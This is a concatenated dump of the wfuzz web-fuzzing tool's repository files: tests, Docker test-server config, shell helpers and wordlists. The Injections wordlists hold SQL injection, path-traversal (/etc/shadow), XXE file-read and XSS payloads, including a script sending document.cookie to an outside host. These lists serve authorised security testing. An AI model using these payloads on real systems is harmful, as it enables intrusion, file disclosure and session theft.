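        (b'<link rel="dns-prefetch" href="https://www.wfuzz.io">\n', [],),
        (b'<script src="//js.wfuzz.org/sttc/main.93d0d236.js"></script>', [],),
    ],
    indirect=["example_full_fuzzres_content"],
)
def test_parsed_links(example_full_fuzzres_content, get_plugin, expected_links):
    """Only links on the scanned host are queued when no domain regex is set."""
    links_plugin = _prepare_links_plugin(get_plugin, example_full_fuzzres_content)

    assert links_plugin.name == "links"

    assert _seed_urls(links_plugin, example_full_fuzzres_content) == expected_links


@pytest.mark.parametrize(
    "example_full_fuzzres_content, expected_links",
    [
        (
            b'<link rel="dns-prefetch" href="https://www.wfuzz.io">\n',
            ["https://www.wfuzz.io/"],
        ),
        (
            b'<script src="//js.wfuzz.org/sttc/main.93d0d236.js"></script>',
            ["http://js.wfuzz.org/sttc/main.93d0d236.js"],
        ),
    ],
    indirect=["example_full_fuzzres_content"],
)
def test_regex_option(example_full_fuzzres_content, get_plugin, expected_links):
    """A domain regex widens the scope: matching foreign hosts are queued too."""
    links_plugin = _prepare_links_plugin(get_plugin, example_full_fuzzres_content)
    links_plugin.domain_regex = re.compile("wfuzz", re.MULTILINE | re.DOTALL)

    assert links_plugin.name == "links"

    assert _seed_urls(links_plugin, example_full_fuzzres_content) == expected_links

--------------------------------------------------------------------------------
/tests/plugins/test_summary.py:
--------------------------------------------------------------------------------
from wfuzz.factories.plugin_factory import plugin_factory
from wfuzz.fuzzobjects import FuzzPlugin

from queue import Queue


def test_sum_plugin_output(example_full_fuzzres):
    """A summary message is visible only when is_visible() is called with False."""
    plugin = plugin_factory.create("plugin_from_summary", "a message")

    assert plugin.is_visible(True) is False
    assert plugin.is_visible(False) is True


def test_find_plugin_output_from_factory():
    """A finding is visible only when is_visible() is called with True."""
    plugin = plugin_factory.create(
        "plugin_from_finding",
        "a plugin",
        "a source",
        "an issue",
        "some data",
        FuzzPlugin.INFO,
    )

    assert plugin.is_visible(True) is True
    assert plugin.is_visible(False) is False


def test_find_plugin_output(get_plugin):
    """add_result() queues a finding with the same visibility as the factory's."""
    plugin = get_plugin("links")[0]
    plugin.results_queue = Queue()
    plugin.add_result("a source", "an issue", "some data", FuzzPlugin.INFO)

    plugin_res = plugin.results_queue.get()

    assert plugin_res.is_visible(True) is True
    assert plugin_res.is_visible(False) is False

--------------------------------------------------------------------------------
/tests/server_dir/Dockerfile:
--------------------------------------------------------------------------------
# NOTE(review): Python 3.6 is end-of-life; a maintained base image keeps the
# test server patched. No USER is set, so the server runs as root in the container.
FROM python:3.6-alpine
# COPY is enough for a local directory; ADD also unpacks archives and fetches URLs.
COPY . /code
WORKDIR /code
EXPOSE 8000/tcp
CMD ["python", "simple_server.py"]

--------------------------------------------------------------------------------
/tests/server_dir/dir/a:
--------------------------------------------------------------------------------
one two thre
two
three
four

--------------------------------------------------------------------------------
/tests/server_dir/dir/b:
--------------------------------------------------------------------------------
one
two

--------------------------------------------------------------------------------
/tests/server_dir/dir/c:
--------------------------------------------------------------------------------
1 2 3 4 5
1 2 3
1 2
1

--------------------------------------------------------------------------------
/tests/server_dir/dir/one:
--------------------------------------------------------------------------------
one two thre
two
three
four

--------------------------------------------------------------------------------
/tests/server_dir/docker-compose.yml:
--------------------------------------------------------------------------------
# NOTE(review): each "HOST:CONTAINER" mapping below publishes the port on every
# host interface, so the test server, the intercepting proxy and httpbin are
# reachable from the network while the stack is up. The two pulled images carry
# no tag or digest, so the test environment changes whenever upstream publishes.
version: '2'
services:
  httpserver:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "8000:8000"
    command: python simple_server.py
  httpproxy:
    image: mitmproxy/mitmproxy
    ports:
      - "8080:8080"
    command: mitmdump
  httpbin:
    image: kennethreitz/httpbin
    ports:
      - "9000:80"

--------------------------------------------------------------------------------
/tests/server_dir/iterators/aa:
--------------------------------------------------------------------------------
1
2
3


--------------------------------------------------------------------------------
/tests/server_dir/iterators/ac:
--------------------------------------------------------------------------------
ac
1
2


--------------------------------------------------------------------------------
/tests/server_dir/iterators/bb:
--------------------------------------------------------------------------------
4

--------------------------------------------------------------------------------
/tests/server_dir/plugins/robots.txt:
--------------------------------------------------------------------------------
user-agent: *
Disallow: /osrun/*
Disallow: /cal_endar/*
Disallow: /crawlsnags/*
Disallow: /static/*
vagrant@vagrant-ubu

--------------------------------------------------------------------------------
/tests/server_dir/recursive_dir/a/b/c/placeholder.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/tests/server_dir/recursive_dir/a/b/c/placeholder.txt
--------------------------------------------------------------------------------
/tests/server_dir/static/placeholder.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/tests/server_dir/static/placeholder.txt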
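--------------------------------------------------------------------------------
/tests/test_clparser.py:
--------------------------------------------------------------------------------
import unittest

from wfuzz.ui.console.clparser import CLParser


class CLParserTest(unittest.TestCase):
    """Command-line parsing checks for CLParser.parse_cl()."""

    def test_listplugins(self):
        """Listing a plugin category exits with status 0."""
        with self.assertRaises(SystemExit) as cm:
            CLParser(["wfuzz", "-e", "iterators"]).parse_cl()

        self.assertEqual(cm.exception.code, 0)

    def test_ip_option(self):
        """--ip accepts host[:port]; a missing or empty port becomes "80"."""
        cases = [
            ("127.0.0.1", "127.0.0.1", "80"),
            ("127.0.0.1:22", "127.0.0.1", "22"),
            ("127.0.0.1:", "127.0.0.1", "80"),
        ]
        for argument, ip, port in cases:
            with self.subTest(argument=argument):
                options = CLParser(["wfuzz", "--ip", argument]).parse_cl()

                self.assertEqual(options.data["connect_to_ip"]["ip"], ip)
                self.assertEqual(options.data["connect_to_ip"]["port"], port)

        with self.assertRaises(Exception) as cm:
            CLParser(["wfuzz", "--ip", ":80"]).parse_cl()
        # Checked after the "with" block: a statement that follows the raising
        # call inside the block would never execute.
        self.assertIn("An IP must be specified", str(cm.exception))

    def test_ze_zd_option(self):
        """--zD/--zE combine with -z; giving the default twice is rejected."""
        with self.assertRaises(Exception) as cm:
            CLParser(["wfuzz", "-z", "range,0-10", "--zD", "0-10", "url"]).parse_cl()
        # Checked after the "with" block so that the message is really compared.
        self.assertIn("exclusive", str(cm.exception))

        # (argv, expected encoder): the default may be given inline or via --zD.
        cases = [
            (["wfuzz", "-z", "range", "--zD", "0-1", "--zE", "md5", "url"], ["md5"]),
            (["wfuzz", "-z", "range,0-1", "--zE", "md5", "url"], ["md5"]),
            (["wfuzz", "-z", "range", "--zD", "0-1"], None),
            (["wfuzz", "-z", "range,0-1"], None),
        ]
        for argv, encoder in cases:
            with self.subTest(argv=argv):
                options = CLParser(argv).parse_cl()
                self.assertEqual(
                    options.data["payloads"],
                    [("range", {"default": "0-1", "encoder": encoder}, None)],
                )

--------------------------------------------------------------------------------
/tests/test_filterintro.py:
--------------------------------------------------------------------------------
import unittest

# Python 2 and 3: urlib.parse

from wfuzz.fuzzobjects import FuzzResult
from wfuzz.fuzzrequest import FuzzRequest
from wfuzz.filters.ppfilter import FuzzResFilter


raw_req = """GET / HTTP/1.1
Host: www.wfuzz.org
User-Agent: curl/7.58.0
Accept: */*
"""

raw_resp = b"""HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Content-Language: en
Location: https://wfuzz.readthedocs.io/en/latest/
Vary: Accept-Language, Cookie
Server: nginx/1.14.0 (Ubuntu)
X-Fallback: True
X-Served: Django
X-Deity: web01
Date: Wed, 23 Jan 2019 21:43:59 GMT
Content-Length: 0
"""


class FilterTest(unittest.TestCase):
    """Error handling of FuzzResFilter for fields that cannot be read or set."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.maxDiff = 1000

    def get_filtered_fuzzrequest(self, filter_str):
        """Build a result from raw_req/raw_resp, apply *filter_str*, return the result."""
        fr = FuzzRequest()
        fr.update_from_raw_http(raw_req, "http", raw_resp, b"")

        fuzz_res = FuzzResult(history=fr)
        FuzzResFilter(filter_string=filter_str).is_visible(fuzz_res)

        return fuzz_res

    def test_nonexisting(self):
        """Filters that touch unknown fields raise with a descriptive message."""
        fr = FuzzRequest()
        fr.url = "http://www.wfuzz.org/path?param=1&param2=2"

        fuzz_res = FuzzResult(history=fr)

        cases = [
            ("url=-'test'", "rsetattr: Can't set"),
            ("notthere=-'test'", "rgetattr: Can't get"),
            ("r.params.get.notthere=-'test'", "DotDict: Non-existing field"),
        ]
        for filter_string, message in cases:
            with self.subTest(filter_string=filter_string):
                with self.assertRaises(Exception) as context:
                    ffilter = FuzzResFilter(filter_string=filter_string)
                    ffilter.is_visible(fuzz_res)
                # Checked after the "with" block: a statement that follows the
                # raising call inside the block would never execute.
                self.assertIn(message, str(context.exception))

--------------------------------------------------------------------------------
/tox.ini:
--------------------------------------------------------------------------------
[tox]
envlist = begin,docker,py38,end

[testenv]
allowlist_externals = make
commands =
    make flake8
    coverage run --append -m pytest -v -s tests/
deps =
    .[dev]

[testenv:docker]
allowlist_externals = docker-compose
changedir = tests
commands = docker-compose -f server_dir/docker-compose.yml up -d

[testenv:begin]
commands = coverage erase
deps = coverage

[testenv:end]
allowlist_externals = make
commands = make coverage
deps = coverage

[testenv:codecov]
passenv = CI TRAVIS TRAVIS_*
deps = codecov
commands = codecov

--------------------------------------------------------------------------------
/wfencode:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | python src/wfencode.py "$@"
3 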
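| -------------------------------------------------------------------------------- /wfencode.bat: -------------------------------------------------------------------------------- 1 | call python src\wfencode.py %* 2 | -------------------------------------------------------------------------------- /wfpayload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python src/wfpayload.py "$@" 3 | -------------------------------------------------------------------------------- /wfpayload.bat: -------------------------------------------------------------------------------- 1 | call python src\wfpayload.py %* 2 | -------------------------------------------------------------------------------- /wfuzz: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python src/wfuzz-cli.py "$@" 3 | -------------------------------------------------------------------------------- /wfuzz.bat: -------------------------------------------------------------------------------- 1 | call python src\wfuzz-cli.py %* 2 | -------------------------------------------------------------------------------- /wfuzz_bash_completion: --------------------------------------------------------------------------------
# wfuzz bash completion file
# by Xavier Mendez (xavi.mendez@gmail.com) aka Javi

# Completion handler for wfuzz: fills COMPREPLY with candidates for the word
# being typed, chosen by the option that precedes it.
#
# This function runs inside the user's interactive shell on every completion
# request and executes whatever "wfuzz" resolves to on PATH. For that reason
# the helper variables are declared local (they no longer leak into, or
# overwrite, variables of the interactive session) and the word being
# completed is always quoted so it is never word-split or glob-expanded.
_wfuzz() {

    COMPREPLY=()
    local cur prev WFUZZ_EX WLDIR
    cur=${COMP_WORDS[COMP_CWORD]}
    prev=${COMP_WORDS[COMP_CWORD-1]}
    WFUZZ_EX="wfuzz"

    case "$prev" in
    -u)
        COMPREPLY=( $( compgen -W "http https" -- "$cur" ) )
        ;;
    -w)
        # Change to your wordlists' base directory.
        # Resolved only for -w, so other completions do not spawn an extra
        # wfuzz process.
        WLDIR=$($WFUZZ_EX --ee files)
        # If wfuzz printed nothing (not installed, or it failed), skip the
        # search: GNU find with no start path would walk the current directory.
        if [ -n "$WLDIR" ]; then
            # $WLDIR is left unquoted on purpose: the output format of
            # "--ee files" is not visible here and may name more than one
            # path -- TODO confirm, then quote it if it is a single directory.
            COMPREPLY=( $(compgen -W "$(find $WLDIR -type f -iname "*.txt")" -- "$cur") )
        fi
        ;;
    -z)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee payloads)" -- "$cur") )
        ;;
    -e)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee registrants)" -- "$cur") )
        ;;
    -m)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee iterators)" -- "$cur") )
        ;;
    -o)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee printers)" -- "$cur") )
        ;;
    --script-help|--script)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee scripts)" -- "$cur") )
        ;;
    --field)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee fields)" -- "$cur") )
        ;;
    --zE)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee encoders)" -- "$cur") )
        ;;
    -V)
        COMPREPLY=( $( compgen -W "allvars allpost allheaders" -- "$cur" ) )
        ;;
    -X)
        COMPREPLY=( $( compgen -W "FUZZ OPTIONS PUT DELETE POST GET TRACE CONNECT HEAD" -- "$cur" ) )
        ;;
    --hc)
        COMPREPLY=( $( compgen -W "400 401 301 302 500 404 200" -- "$cur" ) )
        ;;
    *)
        COMPREPLY=( $(compgen -W "$($WFUZZ_EX --ee options)" -- "$cur") )
        ;;
    esac
}

# Register the handler; "-o default" falls back to readline's default
# completion when the handler returns no candidates.
complete -F _wfuzz -o default wfuzz

-------------------------------------------------------------------------------- /wordlist/Injections/SQL.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | # 4 | - 5 | -- 6 | '%20-- 7 | --'; 8 | '%20; 9 | =%20' 10 | =%20; 11 | =%20-- 12 | \x23 13 | \x27 14 | \x3D%20\x3B' 15 | \x3D%20\x27 16 | \x27\x4F\x52 SELECT * 17 | \x27\x6F\x72 SELECT * 18 | 'or%20select * 19 | admin'-- 20 | <>"'%;)(&+ 21 | '%20or%20''=' 22 | '%20or%20'x'='x 23 | "%20or%20"x"="x 24 | ')%20or%20('x'='x 25 | 0 or 1=1 26 | ' or 0=0 -- 27 | " or 0=0 -- 28 | or 0=0 -- 29 | ' or 0=0 # 30 | " or 0=0 # 31 | or 0=0 # 32 | ' or 1=1-- 33 | " or 1=1-- 34 | ' or '1'='1'-- 35 | "' or 1 --'" 36 | or 1=1-- 37 | or%201=1 38 | or%201=1 -- 39 | ' or 1=1 or ''=' 40 | " or 1=1 or ""=" 41 | ' or a=a-- 42 | " or "a"="a 43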
| ') or ('a'='a 44 | ") or ("a"="a 45 | hi" or "a"="a 46 | hi" or 1=1 -- 47 | hi' or 1=1 -- 48 | hi' or 'a'='a 49 | hi') or ('a'='a 50 | hi") or ("a"="a 51 | 'hi' or 'x'='x'; 52 | @variable 53 | ,@variable 54 | PRINT 55 | PRINT @@variable 56 | select 57 | insert 58 | as 59 | or 60 | procedure 61 | limit 62 | order by 63 | asc 64 | desc 65 | delete 66 | update 67 | distinct 68 | having 69 | truncate 70 | replace 71 | like 72 | handler 73 | bfilename 74 | ' or username like '% 75 | ' or uname like '% 76 | ' or userid like '% 77 | ' or uid like '% 78 | ' or user like '% 79 | exec xp 80 | exec sp 81 | '; exec master..xp_cmdshell 82 | '; exec xp_regread 83 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 84 | --sp_password 85 | \x27UNION SELECT 86 | ' UNION SELECT 87 | ' UNION ALL SELECT 88 | ' or (EXISTS) 89 | ' (select top 1 90 | '||UTL_HTTP.REQUEST 91 | 1;SELECT%20* 92 | to_timestamp_tz 93 | tz_offset 94 | <>"'%;)(&+ 95 | '%20or%201=1 96 | %27%20or%201=1 97 | %20$(sleep%2050) 98 | %20'sleep%2050' 99 | char%4039%41%2b%40SELECT 100 | '%20OR 101 | 'sqlattempt1 102 | (sqlattempt2) 103 | | 104 | %7C 105 | *| 106 | %2A%7C 107 | *(|(mail=*)) 108 | %2A%28%7C%28mail%3D%2A%29%29 109 | *(|(objectclass=*)) 110 | %2A%28%7C%28objectclass%3D%2A%29%29 111 | ( 112 | %28 113 | ) 114 | %29 115 | & 116 | %26 117 | ! 
118 | %21 119 | ' or 1=1 or ''=' 120 | ' or ''=' 121 | x' or 1=1 or 'x'='y 122 | / 123 | // 124 | //* 125 | */* 126 | -------------------------------------------------------------------------------- /wordlist/Injections/Traversal.txt: -------------------------------------------------------------------------------- 1 | ../../../../../../../../../../../../etc/hosts%00 2 | ../../../../../../../../../../../../etc/hosts 3 | ../../boot.ini 4 | /../../../../../../../../%2A 5 | ../../../../../../../../../../../../etc/passwd%00 6 | ../../../../../../../../../../../../etc/passwd 7 | ../../../../../../../../../../../../etc/shadow%00 8 | ../../../../../../../../../../../../etc/shadow 9 | /../../../../../../../../../../etc/passwd^^ 10 | /../../../../../../../../../../etc/shadow^^ 11 | /../../../../../../../../../../etc/passwd 12 | /../../../../../../../../../../etc/shadow 13 | /./././././././././././etc/passwd 14 | /./././././././././././etc/shadow 15 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 16 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 17 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 18 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 19 | /..\../..\../..\../..\../..\../..\../etc/passwd 20 | /..\../..\../..\../..\../..\../..\../etc/shadow 21 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 22 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 23 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 24 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 25 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 26 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 27 | %0a/bin/cat%20/etc/passwd 28 | %0a/bin/cat%20/etc/shadow 29 | %00/etc/passwd%00 30 | %00/etc/shadow%00 31 | %00../../../../../../etc/passwd 32 | %00../../../../../../etc/shadow 33 | /../../../../../../../../../../../etc/passwd%00.jpg 34 | /../../../../../../../../../../../etc/passwd%00.html 35 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 36 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 37 | 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 38 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 39 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 40 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 41 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 42 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 43 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 44 | \\'/bin/cat%20/etc/passwd\\' 45 | \\'/bin/cat%20/etc/shadow\\' 46 | ../../../../../../../../conf/server.xml 47 | /../../../../../../../../bin/id| 48 | C:/inetpub/wwwroot/global.asa 49 | C:\inetpub\wwwroot\global.asa 50 | C:/boot.ini 51 | C:\boot.ini 52 | ../../../../../../../../../../../../localstart.asp%00 53 | ../../../../../../../../../../../../localstart.asp 54 | ../../../../../../../../../../../../boot.ini%00 55 | ../../../../../../../../../../../../boot.ini 56 | /./././././././././././boot.ini 57 | /../../../../../../../../../../../boot.ini%00 58 | /../../../../../../../../../../../boot.ini 59 | /..\../..\../..\../..\../..\../..\../boot.ini 60 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 61 | \..\..\..\..\..\..\..\..\..\..\boot.ini 62 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 63 | ..\..\..\..\..\..\..\..\..\..\boot.ini 64 | /../../../../../../../../../../../boot.ini%00.html 65 | /../../../../../../../../../../../boot.ini%00.jpg 66 | /.../.../.../.../.../ 67 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 68 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 
-------------------------------------------------------------------------------- /wordlist/Injections/XML.txt: -------------------------------------------------------------------------------- 1 | count(/child::node()) 2 | x' or name()='username' or 'x'='y 3 | <name>','')); phpinfo(); exit;/*</name> 4 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 5 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> 10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo> 11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 12 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 13 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 14 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 15 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 16 | -------------------------------------------------------------------------------- /wordlist/Injections/XSS.txt: -------------------------------------------------------------------------------- 1 | "><script>" 2 | <script>alert("WXSS")</script> 3 | 
<<script>alert("WXSS");//<</script> 4 | <script>alert(document.cookie)</script> 5 | '><script>alert(document.cookie)</script> 6 | '><script>alert(document.cookie);</script> 7 | \";alert('XSS');// 8 | %3cscript%3ealert("WXSS");%3c/script%3e 9 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 10 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 11 | <script>alert(document.cookie);</script> 12 | <script>alert(document.cookie);<script>alert 13 | <xss><script>alert('WXSS')</script></vulnerable> 14 | <IMG%20SRC='javascript:alert(document.cookie)'> 15 | <IMG%20SRC="javascript:alert('WXSS');"> 16 | <IMG%20SRC="javascript:alert('WXSS')" 17 | <IMG%20SRC=javascript:alert('WXSS')> 18 | <IMG%20SRC=JaVaScRiPt:alert('WXSS')> 19 | <IMG%20SRC=javascript:alert("WXSS")> 20 | <IMG%20SRC=`javascript:alert("'WXSS'")`> 21 | <IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>"> 22 | <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))> 23 | <IMG%20SRC='javasc ript:alert(document.cookie)'> 24 | <IMG%20SRC="jav ascript:alert('WXSS');"> 25 | <IMG%20SRC="jav ascript:alert('WXSS');"> 26 | <IMG%20SRC="jav ascript:alert('WXSS');"> 27 | <IMG%20SRC="jav ascript:alert('WXSS');"> 28 | <IMG%20SRC="%20%20javascript:alert('WXSS');"> 29 | <IMG%20DYNSRC="javascript:alert('WXSS')"> 30 | <IMG%20LOWSRC="javascript:alert('WXSS')"> 31 | <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> 32 | <IMG%20SRC=javascript:alert('XSS')> 33 | <IMG%20SRC=javascript:alert('XSS')> 34 | <IMG%20SRC=javascript:alert('XSS')> 35 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 36 | "><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script> 37 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 38 | 
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 39 | '';!--"<XSS>=&{()} 40 | -------------------------------------------------------------------------------- /wordlist/Injections/bad_chars.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/Injections/bad_chars.txt -------------------------------------------------------------------------------- /wordlist/general/admin-panels.txt: -------------------------------------------------------------------------------- 1 | account.html 2 | account.php 3 | adm/ 4 | adm/admloginuser.php 5 | adm_auth.php 6 | adm.html 7 | admin/ 8 | admin2/index.php 9 | admin2/login.php 10 | admin2.php 11 | admin/account.html 12 | admin/account.php 13 | admin/admin.html 14 | admin/admin_login.html 15 | admin/admin-login.html 16 | admin/adminLogin.html 17 | admin/admin_login.php 18 | admin/admin-login.php 19 | admin/adminLogin.php 20 | admin/admin.php 21 | admin_area/ 22 | adminarea/ 23 | admin_area/admin.html 24 | adminarea/admin.html 25 | admin_area/admin.php 26 | adminarea/admin.php 27 | admin_area/index.html 28 | adminarea/index.html 29 | admin_area/index.php 30 | adminarea/index.php 31 | admin_area/login.html 32 | adminarea/login.html 33 | admin_area/login.php 34 | adminarea/login.php 35 | admincontrol.html 36 | admincontrol/login.html 37 | admincontrol/login.php 38 | admin/controlpanel.html 39 | admin/controlpanel.php 40 | admincontrol.php 41 | admin/cp.html 42 | admincp/index.asp 43 | admincp/index.html 44 | admincp/login.asp 45 | admin/cp.php 46 | adm/index.html 47 | adm/index.php 48 | admin/home.html 49 | admin/home.php 50 | admin.html 51 | admin/index.html 52 | admin/index.php 53 | administrator/ 54 | 
administrator/account.html 55 | administrator/account.php 56 | administrator.html 57 | administrator/index.html 58 | administrator/index.php 59 | administratorlogin/ 60 | administrator/login.html 61 | administrator/login.php 62 | administrator.php 63 | adminLogin/ 64 | admin_login.html 65 | admin-login.html 66 | admin/login.html 67 | adminLogin.html 68 | admin_login.php 69 | admin-login.php 70 | admin/login.php 71 | adminLogin.php 72 | adminpanel.html 73 | adminpanel.php 74 | admin.php 75 | admloginuser.php 76 | adm.php 77 | affiliate.php 78 | bb-admin/ 79 | bb-admin/admin.html 80 | bb-admin/admin.php 81 | bb-admin/index.html 82 | bb-admin/index.php 83 | bb-admin/login.html 84 | bb-admin/login.php 85 | controlpanel.html 86 | controlpanel.php 87 | cp.html 88 | cp.php 89 | home.html 90 | home.php 91 | instadmin/ 92 | joomla/administrator 93 | login.html 94 | login.php 95 | memberadmin/ 96 | modelsearch/admin.html 97 | modelsearch/admin.php 98 | modelsearch/index.html 99 | modelsearch/index.php 100 | modelsearch/login.html 101 | modelsearch/login.php 102 | moderator/ 103 | moderator/admin.html 104 | moderator/admin.php 105 | moderator.html 106 | moderator/login.html 107 | moderator/login.php 108 | moderator.php 109 | nsw/admin/login.php 110 | pages/admin/admin-login.html 111 | pages/admin/admin-login.php 112 | panel-administracion/ 113 | panel-administracion/admin.html 114 | panel-administracion/admin.php 115 | panel-administracion/index.html 116 | panel-administracion/index.php 117 | panel-administracion/login.html 118 | panel-administracion/login.php 119 | rcjakar/admin/login.php 120 | siteadmin/index.php 121 | siteadmin/login.html 122 | siteadmin/login.php 123 | user.html 124 | user.php 125 | webadmin/ 126 | webadmin/admin.html 127 | webadmin/admin.php 128 | webadmin.html 129 | webadmin/index.html 130 | webadmin/index.php 131 | webadmin/login.html 132 | webadmin/login.php 133 | webadmin.php 134 | wp-login.php 135 | 
-------------------------------------------------------------------------------- /wordlist/general/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/general/big.txt -------------------------------------------------------------------------------- /wordlist/general/catala.txt: -------------------------------------------------------------------------------- 1 | acces 2 | activitats 3 | administracio 4 | afegir 5 | agafar 6 | agenda 7 | ajuda 8 | ajudes 9 | antic 10 | arrel 11 | article 12 | articles 13 | arxiu 14 | arxius 15 | borsa 16 | botiga 17 | bulleti 18 | bustia 19 | calaix 20 | campanyes 21 | capsalera 22 | carpeta 23 | cat 24 | catala 25 | cataleg 26 | catalegs 27 | categories 28 | celler 29 | cerca 30 | cercador 31 | claus 32 | client 33 | clients 34 | colleccio 35 | comunicacio 36 | confirmacio 37 | contingut 38 | continguts 39 | copia 40 | correu 41 | crida 42 | dades 43 | demamar 44 | demanas 45 | descarrega 46 | descarregues 47 | desenvolupament 48 | directori 49 | disseny 50 | document 51 | documentacio 52 | documents 53 | eines 54 | empreses 55 | enllacos 56 | entitats 57 | entorns 58 | esborrar 59 | escola 60 | externes 61 | finestra 62 | fitxer 63 | fitxers 64 | fonts 65 | formulari 66 | formularis 67 | forum 68 | forums 69 | gestio 70 | glossari 71 | historic 72 | imatge 73 | imatges 74 | informacio 75 | inici 76 | jocs 77 | lletres 78 | lleure 79 | llibres 80 | llista 